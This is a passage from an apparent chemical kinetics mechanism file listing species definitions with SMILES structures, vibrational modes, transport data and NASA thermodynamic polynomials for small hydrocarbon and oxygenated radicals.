molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C=[C]C(C)C=O(24541)',
structure = SMILES('C=[C]C(C)C=O'),
E0 = (107.845,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2782.5,750,1395,475,1775,1000,1685,370,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,260.785],'cm^-1')),
HinderedRotor(inertia=(0.159261,'amu*angstrom^2'), symmetry=1, barrier=(7.89024,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.165465,'amu*angstrom^2'), symmetry=1, barrier=(7.90929,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.163225,'amu*angstrom^2'), symmetry=1, barrier=(7.89374,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (83.1085,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.92124,0.0495934,-4.34099e-05,2.53271e-08,-6.94482e-12,13042.2,21.4989], Tmin=(100,'K'), Tmax=(828.663,'K')), NASAPolynomial(coeffs=[5.09623,0.0342678,-1.56686e-05,3.00932e-09,-2.11821e-13,12516,6.77809], Tmin=(828.663,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.845,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-OdCsH) + group(Cds-CdsHH) + radical(Cds_S)"""),
)
species(
label = 'C=C[C](C)C([O])CC(20837)',
structure = SMILES('[CH2]C=C(C)C([O])CC'),
E0 = (93.6706,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,1380,1390,370,380,2900,435,350,440,435,1725,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.230531,0.0810783,-5.01538e-05,1.00705e-08,1.1291e-12,11428.3,33.4333], Tmin=(100,'K'), Tmax=(1136.76,'K')), NASAPolynomial(coeffs=[17.1455,0.0371582,-1.49247e-05,2.73759e-09,-1.89289e-13,6365.1,-57.5174], Tmin=(1136.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(93.6706,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C]C(C)[C](O)CC(24952)',
structure = SMILES('C=[C]C(C)[C](O)CC'),
E0 = (146.165,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0815184,0.0894041,-8.33846e-05,4.50035e-08,-1.03256e-11,17718,32.8981], Tmin=(100,'K'), Tmax=(1024.85,'K')), NASAPolynomial(coeffs=[11.1846,0.0460679,-1.99552e-05,3.7417e-09,-2.60052e-13,15442.2,-20.94], Tmin=(1024.85,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(146.165,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(C2CsJOH)"""),
)
species(
label = '[CH]=CC(C)C([O])CC(20846)',
structure = SMILES('[CH]=CC(C)C([O])CC'),
E0 = (209.152,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,3120,650,792.5,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.420978,0.0846036,-6.28738e-05,2.40705e-08,-3.71766e-12,25324.9,35.0242], Tmin=(100,'K'), Tmax=(1529.81,'K')), NASAPolynomial(coeffs=[19.1374,0.0334648,-1.27319e-05,2.21965e-09,-1.46851e-13,19340.7,-67.6487], Tmin=(1529.81,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(209.152,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(Cds_P)"""),
)
species(
label = 'C=CC(C)[C]([O])CC(20839)',
structure = SMILES('C=CC(C)[C]([O])CC'),
E0 = (138.684,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.00496384,0.0841536,-6.48011e-05,2.66597e-08,-4.55702e-12,16826.4,32.4955], Tmin=(100,'K'), Tmax=(1356.71,'K')), NASAPolynomial(coeffs=[14.7361,0.0407219,-1.67827e-05,3.06443e-09,-2.09164e-13,12829.2,-43.0679], Tmin=(1356.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(138.684,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C2CsJOH) + radical(CC(C)OJ)"""),
)
species(
label = '[CH2]C(C=C)C([O])CC(20587)',
structure = SMILES('[CH2]C(C=C)C([O])CC'),
E0 = (167.138,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3957.94,'J/mol'), sigma=(6.93706,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=618.22 K, Pc=26.9 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.138386,0.0807954,-5.31246e-05,1.37508e-08,1.52791e-13,20259.7,35.37], Tmin=(100,'K'), Tmax=(1086.5,'K')), NASAPolynomial(coeffs=[15.6233,0.0376896,-1.42142e-05,2.5161e-09,-1.70645e-13,15954,-46.0317], Tmin=(1086.5,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(167.138,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Isobutyl) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C][C](C)C(O)CC(24953)',
structure = SMILES('[CH2][C]=C(C)C(O)CC'),
E0 = (101.152,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.112481,0.0860735,-6.86715e-05,2.90429e-08,-5.05969e-12,12317.2,33.6679], Tmin=(100,'K'), Tmax=(1342.79,'K')), NASAPolynomial(coeffs=[15.68,0.0390294,-1.61191e-05,2.9516e-09,-2.01982e-13,8076.02,-47.1765], Tmin=(1342.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(101.152,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Cds_S) + radical(Allyl_P)"""),
)
species(
label = 'C=[C]C(C)C(O)[CH]C(24954)',
structure = SMILES('C=[C]C(C)C(O)[CH]C'),
E0 = (169.439,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.171762,0.0825425,-6.22971e-05,2.46754e-08,-3.98364e-12,20536.5,36.8772], Tmin=(100,'K'), Tmax=(1456.04,'K')), NASAPolynomial(coeffs=[17.009,0.0353439,-1.36736e-05,2.41262e-09,-1.6116e-13,15533.3,-52.4654], Tmin=(1456.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(169.439,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CCJCO)"""),
)
species(
label = '[CH2]C([C]=C)C(O)CC(20843)',
structure = SMILES('[CH2]C([C]=C)C(O)CC'),
E0 = (174.619,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0759969,0.0863803,-7.34535e-05,3.48095e-08,-6.84212e-12,21151.3,35.8096], Tmin=(100,'K'), Tmax=(1202.96,'K')), NASAPolynomial(coeffs=[13.8574,0.0400497,-1.56827e-05,2.7936e-09,-1.88532e-13,17799,-33.9859], Tmin=(1202.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.619,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_S)"""),
)
species(
label = 'C=CC(C)C([O])[CH]C(20844)',
structure = SMILES('C=CC(C)C([O])[CH]C'),
E0 = (161.958,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0812271,0.0733942,-3.02894e-05,-1.03358e-08,8.43313e-12,19631.1,35.2966], Tmin=(100,'K'), Tmax=(1045.58,'K')), NASAPolynomial(coeffs=[16.1214,0.0372244,-1.45432e-05,2.66938e-09,-1.86484e-13,14899.7,-49.3886], Tmin=(1045.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(161.958,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(CCJCO)"""),
)
species(
label = '[CH2]CC(O)C(C)[C]=C(24955)',
structure = SMILES('[CH2]CC(O)C(C)[C]=C'),
E0 = (174.783,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0428563,0.0842572,-6.72652e-05,2.90455e-08,-5.22015e-12,21166.2,35.3871], Tmin=(100,'K'), Tmax=(1296.37,'K')), NASAPolynomial(coeffs=[14.1934,0.0405948,-1.6744e-05,3.06444e-09,-2.09755e-13,17497.3,-36.554], Tmin=(1296.37,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.783,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(RCCJ) + radical(Cds_S)"""),
)
species(
label = '[CH]=[C]C(C)C(O)CC(24956)',
structure = SMILES('[CH]=[C]C(C)C(O)CC'),
E0 = (216.633,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1277.5,1000,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,200,800],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0442295,0.0867601,-7.24804e-05,3.29541e-08,-6.22122e-12,26202.3,34.317], Tmin=(100,'K'), Tmax=(1242.63,'K')), NASAPolynomial(coeffs=[14.2846,0.0406359,-1.6803e-05,3.08335e-09,-2.11624e-13,22641.2,-37.9238], Tmin=(1242.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(216.633,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S)"""),
)
species(
label = '[CH2]CC([O])C(C)C=C(20848)',
structure = SMILES('[CH2]CC([O])C(C)C=C'),
E0 = (167.302,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.165473,0.0802755,-5.20289e-05,1.39198e-08,-4.88702e-13,20281.2,35.4794], Tmin=(100,'K'), Tmax=(1179.79,'K')), NASAPolynomial(coeffs=[16.5222,0.0373397,-1.47849e-05,2.67545e-09,-1.82893e-13,15394.2,-51.8117], Tmin=(1179.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(167.302,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(RCCJ) + radical(CC(C)OJ)"""),
)
species(
label = 'C=C=C(C)C(O)CC(24957)',
structure = SMILES('C=C=C(C)C(O)CC'),
E0 = (-111.585,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.150628,0.0848636,-6.56053e-05,2.65433e-08,-4.39688e-12,-13266.1,32.1074], Tmin=(100,'K'), Tmax=(1412.47,'K')), NASAPolynomial(coeffs=[16.6026,0.0374197,-1.52212e-05,2.76264e-09,-1.87811e-13,-17998.7,-54.5026], Tmin=(1412.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.585,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + group(Cdd-CdsCds)"""),
)
species(
label = 'C=CC(C)C(=O)CC(20852)',
structure = SMILES('C=CC(C)C(=O)CC'),
E0 = (-210.284,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.566841,0.081795,-7.1471e-05,4.03868e-08,-1.05585e-11,-25173.2,28.8177], Tmin=(100,'K'), Tmax=(870.489,'K')), NASAPolynomial(coeffs=[6.43572,0.054827,-2.5001e-05,4.79787e-09,-3.37625e-13,-26194.9,1.31771], Tmin=(870.489,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-210.284,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + group(Cds-CdsCsH) + group(Cds-CdsHH)"""),
)
species(
label = 'CH2(S)(23)',
structure = SMILES('[CH2]'),
E0 = (419.862,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1369.36,2789.41,2993.36],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19195,-0.00230793,8.0509e-06,-6.60123e-09,1.95638e-12,50484.3,-0.754589], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.28556,0.00460255,-1.97412e-06,4.09548e-10,-3.34695e-14,50922.4,8.67684], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(419.862,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C=[C]CC([O])CC(24958)',
